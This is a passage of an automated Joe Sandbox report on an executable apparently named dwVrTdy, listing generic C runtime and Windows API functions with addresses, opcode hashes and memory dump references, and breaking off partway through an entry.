unknown error, xrefs: 00007FF643F22A86

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: FormatFreeInfoLocalLocaleMessage
String ID: unknown error
API String ID: 334183667-3078798498
Opcode ID: dd9682ce97c1c0a7eda2dea6ee7eda1403629615652cd6638d874aff6c2c7934
Instruction ID: febebcd19a577382e8f3a6e79510aebffaaba08adadf078c1a9157b477f057ec
Opcode Fuzzy Hash: dd9682ce97c1c0a7eda2dea6ee7eda1403629615652cd6638d874aff6c2c7934
Instruction Fuzzy Hash: A501D66261CB41C0EBA0BB11F44206A77A0EBD87D8F545135EA8D97BA9DE3CD5908B00

Function 00007FF643F5E314 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 00007FF643F5E323
GetLastError.KERNEL32 ref: 00007FF643F5E339

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
Instruction ID: 7a1c62aa7097281d435c738e52312886980db7da96ce7347298a8ba26b8dfd13
Opcode Fuzzy Hash: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
Instruction Fuzzy Hash: 6B01DB22B0C68282EB407B19B041769BB909BE43E4F144034D989C37D9DFBCD4449F00

Function 00007FF643F69078 Relevance: 3.0, APIs: 2, Instructions: 31threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF643F69086
ExitThread.KERNEL32 ref: 00007FF643F6908E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
Instruction ID: 4dfa2093d94f6aa2aa235ff77e7dbf202e54396a654a3f5a1c2a43c77334804a
Opcode Fuzzy Hash: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
Instruction Fuzzy Hash: C5F06D16E0D64282FF94BB7184471BD2260EF58B44F041034D90EE32E6DF2CA446A300

Function 00007FF643F62A38 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A68
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F62A6E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
Instruction ID: eb0875633b9254bcca7dacffa004f883c95114d41c33028bb7600709e4256650
Opcode Fuzzy Hash: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
Instruction Fuzzy Hash: 3AE0EC40E1D10761FDE835E119474B900401F25B70E182B30D97DA76D3AE5CA953B211

Function 00007FF643F78340 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78356
GetLastError.KERNEL32(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78360

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
Instruction ID: 958ecf318cef03ce475361a78f5a82dea948df6e32d4a702181619dfec7679c3
Opcode Fuzzy Hash: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
Instruction Fuzzy Hash: C0E04651E1D20382FBD8BFB2989747922605F98B80B444430CC0EE72E2EF2CA988A300

Function 00007FF643F78550 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF643F783CD,?,?,00000000,00007FF643F78482), ref: 00007FF643F785BE
GetLastError.KERNEL32(?,?,?,00007FF643F783CD,?,?,00000000,00007FF643F78482), ref: 00007FF643F785C8

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
Instruction ID: 217cd359de654663f9605acf1cb5c00d0c382a8a12724deba9630fa557a8caf8
Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
Instruction Fuzzy Hash: 36215161F0C68241EAE4B761A5972791681AF847E4F884635DA2EE73D2DF6CE445B300

Function 00007FF643F3DF30 Relevance: 1.7, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3E207

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 7e4a539f881bd60cbd7d80cf131619e2504d14740298b2d1d92c03c120af3a8f
Instruction ID: 783c3f73300d4e42489fbe00cfff63c5cdd555a08c3c165499cd777366f7e205
Opcode Fuzzy Hash: 7e4a539f881bd60cbd7d80cf131619e2504d14740298b2d1d92c03c120af3a8f
Instruction Fuzzy Hash: 87A1AD73B18A4189EB50ABA5C0912AC37B1FB58B68F041632DF6DA7BD4DF38D495D300

Function 00007FF643F25680 Relevance: 1.7, APIs: 1, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb93f9686359084c85241550ad29dbe41f7f4196387cce9997bfce311b75db2
Instruction ID: 85b2dc79084f6c95ee6732a5b29a15729a93b7bcccd9a9e852bc48627c30fd38
Opcode Fuzzy Hash: afb93f9686359084c85241550ad29dbe41f7f4196387cce9997bfce311b75db2
Instruction Fuzzy Hash: 73610C62A1CA86C2EAA0BB19D2062FDE3D1FB50BE0F444131EE5DA76D5DF7DF4819600

Function 00007FF643F527F0 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F52A2B

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 234c8d8404e4ae55aa01bccdf58525c0d7ea71ab3467ba81e049c1528259c199
Instruction ID: 628dc22cf20ccf711adb4cb0b1e94bc254f66a3b0001b88d7c634f7ef710c936
Opcode Fuzzy Hash: 234c8d8404e4ae55aa01bccdf58525c0d7ea71ab3467ba81e049c1528259c199
Instruction Fuzzy Hash: 9A61A473B1CB8585EB40EB65E4412ADA760FB84B94F108222DF8DA3BA9DF3CD045D700

Function 00007FF643F79510 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F79538

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
Instruction ID: 8d2b3773ede08c4533dd38480b8a9ff15eb14d5d8abb9266b09b8c6113734f87
Opcode Fuzzy Hash: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
Instruction Fuzzy Hash: 9041D43291C20147FAB4BB18E54227A73A4EB56B94F541234DA9EE3AD1CF2DE403EB50

Function 00007FF643F52AE0 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F52C35

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9cccaee861e2e0c779c18cdcd6089f6ad43d0aa4501e732947362008fa362c1e
Instruction ID: fff1f794a69892302030e42e12d005ad04661fd47b332f59e3c7c760f0a82a48
Opcode Fuzzy Hash: 9cccaee861e2e0c779c18cdcd6089f6ad43d0aa4501e732947362008fa362c1e
Instruction Fuzzy Hash: 0831C222A1CB8152EA50FB50E4513AAA361FBD57D0F149231FACD53AEBDF3DD4819B00

Function 00007FF643F3CF20 Relevance: 1.6, APIs: 1, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3D012

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 08403479985c3ed76a3551fa88ffb5f54d57c54fd0b914bd84394c8959b0d9ec
Instruction ID: d1015977211fb517d3562ad51137dc351395c30095766560ca40035ba60df147
Opcode Fuzzy Hash: 08403479985c3ed76a3551fa88ffb5f54d57c54fd0b914bd84394c8959b0d9ec
Instruction Fuzzy Hash: AF315876B09B4982DF55AF69D09126C3361EB48F88B448032DF0D977A9DF3CD891D350

Function 00007FF643F8695C Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F868A7

Part of subcall function 00007FF643F6CD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD69
Part of subcall function 00007FF643F6CD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF643F6CD0F,?,?,?,?,?,00007FF643F6CBFA), ref: 00007FF643F6CD8E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID:
API String ID: 4036615347-0
Opcode ID: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
Instruction ID: dffb41e401f7832d2277932a6ac14cf99471f02ad2793337ff27bf4c0d2d45bf
Opcode Fuzzy Hash: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
Instruction Fuzzy Hash: 3F21B421B0D71242FBEDBA665202239A690AF44BE0F144D30DF5CA7BC5DF3DE8166301

Function 00007FF643F7B930 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7B9B6

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
Instruction ID: 21f7233c8e305399e4e607a61a263c89ca583e0837c1d81a336c48cd00aac7e8
Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
Instruction Fuzzy Hash: 0B31D332A2C60282F7E1BF1588473BC2A60AF55B90F550235EA3DA33D2DF7CE845A710

Function 00007FF643F30FF0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F310C0

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 46713c96f3fb3f4d89f52796d8da4db44da4b70b41aedb2393583da456be5a29
Instruction ID: 9f11380bf02a5102d4768c65c3ac5f041d936d4aa7952095a1687a66890720ff
Opcode Fuzzy Hash: 46713c96f3fb3f4d89f52796d8da4db44da4b70b41aedb2393583da456be5a29
Instruction Fuzzy Hash: E51151A2A1868691EB44FB25D1563BD2351EB11FC8F804031DA5D5BADBDF6ED8C4D380

Function 00007FF643F48870 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F3F4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F3F5E2
Part of subcall function 00007FF643F3F4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF643F3F5E8

Part of subcall function 00007FF643F691B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF643F691DB

std::_Throw_Cpp_error.LIBCPMT ref: 00007FF643F48957

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
String ID:
API String ID: 88918588-0
Opcode ID: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
Instruction ID: 263f0ffa3f3747da899071cbf8528263f5b988f2de036dd5bbf38c62f447013d
Opcode Fuzzy Hash: cda83e72df4b4452b10499556b15efd889cd94d2f8c263e70bb30bbf8a668c49
Instruction Fuzzy Hash: 77218E3260CB8081E7A0FF12E4526AA73A0FB88BD0F459031EE8D97B99DE3CD041C700

Function 00007FF643F68635 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF643F68663

Part of subcall function 00007FF643F6875C: GetModuleHandleExW.KERNEL32 ref: 00007FF643F68781
Part of subcall function 00007FF643F6875C: GetProcAddress.KERNEL32 ref: 00007FF643F68797
Part of subcall function 00007FF643F6875C: FreeLibrary.KERNEL32 ref: 00007FF643F687BE

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
Instruction ID: 9fc1222cdf16e04306179ad0e3da307c15239f3d476289ca5047ee6733da811a
Opcode Fuzzy Hash: 12c8ddd49b29eafe03094771190050c500c37e2408f84eeddbfe35924bea53d0
Instruction Fuzzy Hash: 42218332A18B0989EBA4BF64C4812EC33B0EB4471CF441639D71D97AC5DF39D886D740

Function 00007FF643F7D94C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7D96F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
Instruction ID: d006ac66dcf79cc8f45f5bd95bb86213b6e32ab1669c34910b3b7b5326d21203
Opcode Fuzzy Hash: 17c84bb8df17f7340c3a78faa9adff03cae7faf370082ad63592511e71fde380
Instruction Fuzzy Hash: FC218472A0C68287DBA1BF18D48137976B0FB84B94F684235EA5DD76DADF3DD4049B00

Function 00007FF643F7DA10 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F7DA33

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
Instruction ID: 861d65689c6a1f9c0de684bf615f2b613c83a859eaf937bd128f17c62d12dc66
Opcode Fuzzy Hash: 3f3ede2bc854db419c29ee7d11418b5426f282dde39881f24eb10840af044c49
Instruction Fuzzy Hash: 3321A43261C68287EBA1BF1CD44237976A0FB84B94F684235EA5DD76DADF3CD5009B00

Function 00007FF643F48610 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F486B3

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9fa15735631767cc7a8a2c7e5030338c03b017a03d34edb59f1dd26dc0a53627
Instruction ID: 9cc26069e3c462cc60bc4b1c1de3cbb340e74043ceddc3338051bdcaa39c693a
Opcode Fuzzy Hash: 9fa15735631767cc7a8a2c7e5030338c03b017a03d34edb59f1dd26dc0a53627
Instruction Fuzzy Hash: 2D11E522B0C68552FA84BF15E25637E2361EB14BC4F945431D70D5BAC6DF7ED8A19340

Function 00007FF643F69DA8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F69DD9

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
